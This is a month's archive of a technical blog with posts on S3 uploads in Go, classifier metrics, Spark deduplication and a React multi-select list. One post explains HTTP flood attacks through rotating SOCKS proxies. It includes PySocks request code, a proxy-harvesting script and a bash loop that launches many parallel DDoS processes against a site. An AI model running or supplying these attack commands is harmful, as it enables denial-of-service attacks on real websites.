run KISS: May 2022

Monday, May 30, 2022

Upload File to AWS S3 in Go

In this post we will review how to upload a file to AWS S3 in Go.

First we create an AWS session. We can use one of the methods specified in this post, but in this case we need to support different AWS session/credentials for each upload, hence we statically supply the AWS session configuration.

import (
   "context"
   "github.com/aws/aws-sdk-go/aws"
   "github.com/aws/aws-sdk-go/aws/credentials"
   "github.com/aws/aws-sdk-go/aws/session"
   "github.com/aws/aws-sdk-go/service/s3/s3manager"
   "strings"
)

func uploadFile() {
   region := "us-east-1"
   accessKey := "AKIAWXXXXXXXXXXXRQWU"
   secretKey := "XXXXKsqJ2inJdxBdXXXXDE0jX+gxxFXXXXRVXX"

   config := aws.Config{
      Region:      aws.String(region),
      Credentials: credentials.NewStaticCredentials(accessKey, secretKey, ""),
   }
   awsSession, err := session.NewSession(&config)
   if err != nil {
      panic(err)
   }

Next we upload the file using the S3 manager. The key in the bucket can include folders, and there is no need to create any sub-folders first, as S3 does not actually keep folders. It is a key-value store, and the folders are only a presentation of the key prefixes in the AWS console GUI.

   bucketName := "my-bucket"
   keyInBucket := "folder1/my-file.txt"
   fileContent := "this is my data"

   uploader := s3manager.NewUploader(awsSession)

   input := &s3manager.UploadInput{
      Bucket:      aws.String(bucketName),
      Key:         aws.String(keyInBucket),
      Body:        strings.NewReader(fileContent),
      ContentType: aws.String("text/plain"),
   }
   _, err = uploader.UploadWithContext(context.Background(), input)
   if err != nil {
      panic(err)
   }
}
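The flat key-value behavior described above can be illustrated with a toy in-memory model. This is only a sketch in plain Python, not the AWS SDK: the `bucket` dictionary and the `put_object` and `list_keys` helpers are hypothetical names used for illustration.

```python
# Toy model of a flat key-value namespace: a "bucket" is just a mapping
# of key -> bytes. This is an illustration only, not the AWS API.
bucket = {}


def put_object(key, body):
    """Store an object under a key; no 'folder' has to exist beforehand."""
    bucket[key] = body


def list_keys(prefix):
    """Return the keys that start with the given prefix, sorted."""
    return sorted(k for k in bucket if k.startswith(prefix))


put_object("folder1/my-file.txt", b"this is my data")
put_object("folder1/sub/other.txt", b"more data")
put_object("readme.txt", b"top level")

# A "folder" listing is nothing more than a filter on the key prefix.
folder1_keys = list_keys("folder1/")
print(folder1_keys)
```

The slash in the key has no special meaning in this model, it is simply part of the key string.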

Monday, May 23, 2022

Classification Algorithm Performance Metrics

In this post we will review metrics for measuring the results of a classification algorithm.

For this purpose, let's assume we have run a classification algorithm to classify damaged parts by examining a picture of each part.

We ran the algorithm over 1,000 parts, and the algorithm detected 170 damaged parts. This information by itself provides zero visibility into the performance of the algorithm. To analyze this result, we need to start with a confusion matrix.

	Predicted: Valid	Predicted: Damaged
Actual: Valid	800	40
Actual: Damaged	30	130

The confusion matrix inspects two aspects for each part:

What is the actual part status: Valid or Damaged
What is the algorithm classification: Valid or Damaged.

To speak the same language regardless of the data domain, we use the terms True/False and Positive/Negative.

True - means the algorithm classification is correct
False - means the algorithm classification is wrong
Positive - means the algorithm marked the part as damaged
Negative - means the algorithm marked the part as valid

Notice that Positive/Negative can be defined the other way around, depending on the definition of the algorithm's purpose. In this case we have defined the algorithm's purpose as "to classify damaged parts", hence we treat Positive as the classification of a part as damaged.

We can rewrite the confusion matrix using these terms:

	Predicted: Negative	Predicted: Positive
Actual: Negative	True Negative = 800	False Positive = 40
Actual: Positive	False Negative = 30	True Positive = 130

And so, the terms are:

True Negative - correct detection as a valid part
True Positive - correct detection as a damaged part
False Negative - wrong detection of a damaged part as a valid part
False Positive - wrong detection of a valid part as a damaged part
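The four terms above can be sketched as a small helper that names the confusion matrix cell for a single part. This is a minimal sketch: the function names and the sample data are hypothetical, and `True` stands for "damaged" because we treat damaged as Positive.

```python
from collections import Counter


def confusion_cell(actual_damaged, predicted_damaged):
    """Name the confusion matrix cell for a single part."""
    # True/False: was the classification correct?
    correctness = "True" if actual_damaged == predicted_damaged else "False"
    # Positive/Negative: what did the algorithm predict?
    prediction = "Positive" if predicted_damaged else "Negative"
    return f"{correctness} {prediction}"


def confusion_counts(pairs):
    """Count the cells over (actual_damaged, predicted_damaged) pairs."""
    return Counter(confusion_cell(actual, predicted) for actual, predicted in pairs)


# Hypothetical sample of five parts: (actual_damaged, predicted_damaged)
sample = [
    (False, False),  # valid part, detected as valid
    (False, True),   # valid part, detected as damaged
    (True, False),   # damaged part, detected as valid
    (True, True),    # damaged part, detected as damaged
    (True, True),    # damaged part, detected as damaged
]
counts = confusion_counts(sample)
print(dict(counts))
```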

To estimate the performance, we can use several more metrics that are based on the confusion matrix.

Precision = TP / (TP+FP)

In other words, the precision is the fraction of the parts detected as damaged that are actually damaged.

Recall = TP / (TP+FN)

In other words, the recall is the fraction of the actually damaged parts that the algorithm detected as damaged.

And, last, we can use a metric to combine the Precision (P) and Recall (R).

F1 Score = 2PR/(P+R)

The F1 Score ranges between 0-1, where 1 means a perfect classifier.

Let's examine our classifier metrics:

Precision = 130 / (130+40) = 0.765

Recall = 130 / (130+30) = 0.8125

F1 Score = 2 * 0.765 * 0.8125 / (0.765 + 0.8125) = 0.788
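The same arithmetic can be checked with a few lines of code. This is a minimal sketch using the counts from the confusion matrix above. The function names are our own, and the sketch assumes the denominators are not zero.

```python
def precision(tp, fp):
    """Fraction of predicted positives that are actually positive."""
    return tp / (tp + fp)


def recall(tp, fn):
    """Fraction of actual positives that were predicted as positive."""
    return tp / (tp + fn)


def f1_score(p, r):
    """Harmonic mean of precision and recall."""
    return 2 * p * r / (p + r)


# Counts taken from the confusion matrix in this post
tp, fp, fn = 130, 40, 30

p = precision(tp, fp)
r = recall(tp, fn)
f1 = f1_score(p, r)
print(p, r, f1)
```

Notice that the True Negative count is not used by any of these three metrics.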

Monday, May 16, 2022

Spark Parallelism Use Case Analysis

In this post we will review a use case of performance improvement in a Spark cluster.

The Spark cluster was used to get JSON objects from many files located in S3.

However, due to a bug in the application creating the files, we had to remove duplicate JSON objects.

The original implementation used the following code:

# RDD of all JSON objects
rdd = load_all_json_files_from_s3()
# convert (JSON) to (string_of_JSON,JSON)
rdd = rdd.map(lambda x: (str(x), x))
# remove duplicates by the string_of_JSON
rdd = rdd.reduceByKey(lambda x, _: x, 10)
# get back just the objects
rdd = rdd.map(lambda x: x[1])

The problem in this case is that the reduceByKey method needs to compare each object with all the other objects, hence the cost is very high. In addition, this implementation totally ignored the fact that each JSON object includes a timestamp, which can assist in better partitioning.

To fix this, we've updated the implementation to the following:

partitions_count = 100

def get_partition_by_time(transaction_time):
    minutes_since_midnight = transaction_time.hour * 60 + transaction_time.minute
    partition = minutes_since_midnight % partitions_count
    return partition


# RDD of all JSON objects
rdd = load_all_json_files_from_s3()
# convert RDD: transaction_json_object -> RDD: (time,transaction_json_object)
rdd = rdd.map(lambda t: (t['timestamp'], t))


# re-partition according to the time of the transaction
rdd = rdd.partitionBy(partitions_count, get_partition_by_time)

# convert RDD: (time,transaction_json_object) -> RDD: ((time,transaction_json_string), transaction_json_object)
rdd = rdd.map(lambda t: ((t[0], str(t[1])), t[1]))

# reduce by the key tuple to prevent duplicates
rdd = rdd.reduceByKey(lambda t1, t2: t1,
                      partitions_count,
                      lambda key: get_partition_by_time(key[0]))

# convert RDD: ((time,transaction_json_string), transaction_json_object) -> RDD: transaction_json_object
rdd = rdd.map(lambda t: t[1])

Notice that we use the timestamp, which is part of the key, not only to reduce the number of objects to compare with, but also to determine the partition where the object will be handled. Hence, all the de-duplication work for an object is done within a single partition.
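The idea can be simulated without a cluster. The following is a minimal sketch in plain Python, not Spark code: it routes each object to a partition by its timestamp and removes duplicates only within that partition. The `deduplicate` helper and the sample transactions are hypothetical, and we assume the timestamp is already parsed into a `datetime`.

```python
from collections import defaultdict
from datetime import datetime

PARTITIONS_COUNT = 100


def get_partition_by_time(transaction_time):
    """Same partitioning rule as in the Spark code above."""
    minutes_since_midnight = transaction_time.hour * 60 + transaction_time.minute
    return minutes_since_midnight % PARTITIONS_COUNT


def deduplicate(transactions):
    """Route each object to a partition, de-duplicate inside each partition."""
    partitions = defaultdict(dict)
    for t in transactions:
        partition = get_partition_by_time(t["timestamp"])
        # key tuple: (time, string of the object), as in the Spark version
        key = (t["timestamp"], str(t))
        # keep only the first object seen for each key
        partitions[partition].setdefault(key, t)
    return [t for objects in partitions.values() for t in objects.values()]


# Hypothetical sample: the first two objects are duplicates
sample = [
    {"timestamp": datetime(2022, 5, 16, 10, 15), "amount": 5},
    {"timestamp": datetime(2022, 5, 16, 10, 15), "amount": 5},
    {"timestamp": datetime(2022, 5, 16, 11, 55), "amount": 7},
]
unique = deduplicate(sample)
print(len(unique))
```

In this sample, 10:15 and 11:55 land in the same partition (615 and 715 minutes, both modulo 100), yet they stay distinct because the key tuple differs. Duplicates always share a timestamp, so they always meet in the same partition.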

After this change, the run time of the application dropped from 4 hours to 20 minutes. This is a great example of how being aware of the actual work done by each partition is critical to getting good performance from the Spark cluster.

Monday, May 9, 2022

Using SOCKS4/5 HTTP Proxies

In this post we will review the usage of SOCKS4 and SOCKS5 proxies for HTTP traffic, and some open source tools that utilize them.

These proxies, also referred to as anonymous proxies, serve as intermediaries which send an HTTP request to a target web server as requested by a client. Some of these proxies are available only to paying customers, but there are also some free proxies. Check out the site https://www.socks-proxy.net for a list of some of these servers.

The proxies can be used to hide a client IP, but they are also used to mount a DDoS attack on a web site. The capability to attack a web site from multiple source IPs makes it difficult to protect the web site. Unlike an attack from a single source IP, which can simply be blocked upon detection of the attacking party, each of these proxies has its own IP, and hence blocking a single IP does not help, and even detecting the attack is harder.

Not only that, but some tools, such as CC Tool, Saphyra, and MHDDoS, are globally available open source tools that not only use multiple SOCKS4/SOCKS5 proxies, but also randomize the HTTP requests, including the HTTP headers, the HTTP URL, and the HTTP cookies. Hence there are not only multiple attacking IPs, but also multiple request formats, which makes the attack hard to identify.

Let's examine, for example, the CC tool. It starts by downloading a list of SOCKS4 or SOCKS5 proxy servers, and then validates the connection to them. Then, it uses only the proxy servers that were successfully validated, and starts multiple threads to send HTTP requests. Each thread randomly selects one of the proxy servers, and sends multiple requests to the server. The requests include a random URL suffix, and random headers out of a static list of predefined headers.

The SOCKS4 and SOCKS5 support is included in the PySocks library, and a simple usage is as follows:

import socks
s = socks.socksocket()
if proxy_type == 4:
    s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1]))
if proxy_type == 5:
    s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1]))
if brute:
    s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
s.settimeout(3)
s.connect((str(target), int(port)))
if protocol == "https":
    ctx = ssl.SSLContext()
    s = ctx.wrap_socket(s, server_hostname=target)
get_host = "GET " + path + add + randomurl() + " HTTP/1.1\r\nHost: " + target + "\r\n"
request = get_host + header
sent = s.send(str.encode(request))
if not sent:
    break
s.close()

Some tools reuse the same socket, and send multiple GET/POST requests on the same socket without waiting for a response. This multiplies the effect of the attack, especially if no protection/validation method is used on the server side.

To run the CC tool, we first run it to create a list of proxies to use, for example:

#!/bin/bash

set -x
VERSION=$1

python3 cc_new.py -down  -mode cc -v ${VERSION} -f socks${VERSION}_download_all.txt
sort socks${VERSION}_download_all.txt | uniq -u > socks${VERSION}_download_unique.txt
wc -l socks${VERSION}_download_unique.txt
cp socks${VERSION}_download_unique.txt socks${VERSION}.txt
python3 cc_new.py -check -mode cc -v ${VERSION} -f socks${VERSION}.txt
wc -l socks${VERSION}.txt

Then, we can run the DDoS using:

#!/bin/bash

set -x
VERSION=$1
METHOD=$2

ulimit -n 999999
for i in {1..20}; do python3 cc_new.py -url http://my-site.com -m ${METHOD} -v ${VERSION} -f socks${VERSION}.txt -s 600 -t 400& done

Monday, May 2, 2022

Multi-Selection List in React

In this post we will implement a simple multi-selection list in React.

We start with the component configuration. The name of the component is GuiMultiSelect.

import styles from './component.module.css'

function GuiMultiSelect(props) {
  const {selected, options, onChange, label} = props

The multi-selection receives the following properties:

options - a list of strings with the possible values
selected - a list of strings with the selected values
label - the label to add for the list
onChange - callback to invoke upon selection change

The rendering of the component includes the label and the select element, which contains the list of the options.

  return (
    <div>
      <div className={styles.label}>
        {label}
      </div>
      <select
        multiple={true}
        className={styles.select}
        size={20}
        onChange={handleChange}
      >
        {items}
      </select>
    </div>
  )
}

export default GuiMultiSelect

The options rendering uses the values from the options property, and sets the selected attribute for each option that appears in the selected property.

const items = []
options.forEach(option => {
  items.push(
    <option
      key={option}
      value={option}
      selected={selected.includes(option)}
    >
      {option}
    </option>,
  )
})

The change handler reads the updated status of each option, and passes a new list of strings with the selected values to the onChange callback.

function handleChange(event) {
  const newSelected = []
  const items = event.target.getElementsByTagName('option')
  for (let i = 0; i < items.length; i++) {
    const option = items[i]
    if (option.selected) {
      newSelected.push(option.value)
    }
  }
  onChange(newSelected)
}

In addition, we add styling for the elements.

component.module.css

.select {
    width: 500px;
    font-size: 20px;
    margin-left: 20px;
}

.label{
    padding: 25px;
}

The full code is below.

component.js

import styles from './component.module.css'

function GuiMultiSelect(props) {
  const {selected, options, onChange, label} = props

  function handleChange(event) {
    const newSelected = []
    const items = event.target.getElementsByTagName('option')
    for (let i = 0; i < items.length; i++) {
      const option = items[i]
      if (option.selected) {
        newSelected.push(option.value)
      }
    }
    onChange(newSelected)
  }

  const items = []
  options.forEach(option => {
    items.push(
      <option
        key={option}
        value={option}
        selected={selected.includes(option)}
      >
        {option}
      </option>,
    )
  })

  return (
    <div>
      <div className={styles.label}>
        {label}
      </div>
      <select
        multiple={true}
        className={styles.select}
        size={20}
        onChange={handleChange}
      >
        {items}
      </select>
    </div>
  )
}

export default GuiMultiSelect